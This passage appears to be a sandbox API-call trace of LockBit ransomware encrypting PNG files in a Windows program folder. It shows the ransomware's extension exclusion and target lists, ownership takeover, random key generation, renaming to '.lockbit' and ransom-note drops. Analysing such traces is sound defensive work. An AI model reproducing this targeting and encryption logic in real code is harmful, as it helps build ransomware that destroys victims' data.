returned=".png" [0092.139] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.139] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.139] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.139] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.140] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.140] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.140] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.140] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.140] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.140] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.140] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.140] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.141] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.141] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.141] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.141] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.141] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.141] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.141] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0092.141] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0092.141] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0092.141] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0092.141] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0092.141] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0092.141] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0092.141] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0092.141] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png") returned=".png" [0092.141] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.141] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.141] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.141] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.141] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.141] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.141] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.142] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.142] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.142] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.142] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.142] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.142] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.142] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.142] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.142] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.lockbit") returned 101 [0092.142] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.146] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.148] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.148] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.150] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.151] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.151] RtlFreeAnsiString (AnsiString="\\") [0092.151] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0092.151] malloc (_Size=0x200) returned 0x77d800 [0092.152] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.152] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.152] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.152] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.153] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.153] CloseHandle (hObject=0x13dc) returned 1 [0092.153] free (_Block=0x77d800) [0092.153] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0092.153] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.153] malloc (_Size=0x40068) returned 0x3df0128 [0092.156] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x3df0140 | out: lpFileSize=0x3df0140*=3118) returned 1 [0092.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3015c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3015c) returned 0x0 [0092.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3016c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3016c) returned 0x0 [0092.162] ReadFile (in: hFile=0x13dc, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0092.306] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.306] malloc (_Size=0xe0) returned 0x77d800 [0092.306] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xe0, FileInformationClass=0xa) returned 0xc0000008 [0092.307] free (_Block=0x77d800) [0092.307] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0092.307] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0092.307] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.307] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f766b90, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f766b90, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5529264d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0092.307] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0092.307] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0092.307] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0092.307] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.307] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.307] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.308] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.308] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.308] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.308] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.308] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.308] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.308] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.308] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.308] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.309] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.309] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0092.309] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0092.309] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0092.309] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0092.309] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0092.309] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0092.309] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0092.309] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0092.309] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png") returned=".png" [0092.309] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.309] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.309] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.309] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.310] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.310] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.310] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.310] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.310] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.310] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.310] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.310] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.310] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.310] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.310] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.310] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.310] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.310] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.310] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.310] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.310] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.310] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.lockbit") returned 92 [0092.310] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.312] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.315] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.315] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.317] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.320] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.320] RtlFreeAnsiString (AnsiString="\\") [0092.320] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0092.320] malloc (_Size=0x200) returned 0x77d800 [0092.320] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.320] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.321] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.321] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.322] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.325] CloseHandle (hObject=0x13dc) returned 1 [0092.325] free (_Block=0x77d800) [0092.325] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0092.325] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.325] malloc (_Size=0x40068) returned 0x1ff1e60 [0092.325] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4955) returned 1 [0092.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0092.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0092.330] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.332] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.332] malloc (_Size=0xce) returned 0x77d800 [0092.332] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xce, FileInformationClass=0xa) returned 0x0 [0092.333] free (_Block=0x77d800) [0092.333] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0092.333] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0092.333] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.333] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7b2e4a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7b2e4a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0092.333] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0092.333] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0092.333] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0092.333] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.333] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.333] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.333] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.333] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.333] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.333] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.333] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.333] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.334] lstrcmpiW (lpString1=".rtp", lpString2=".png") 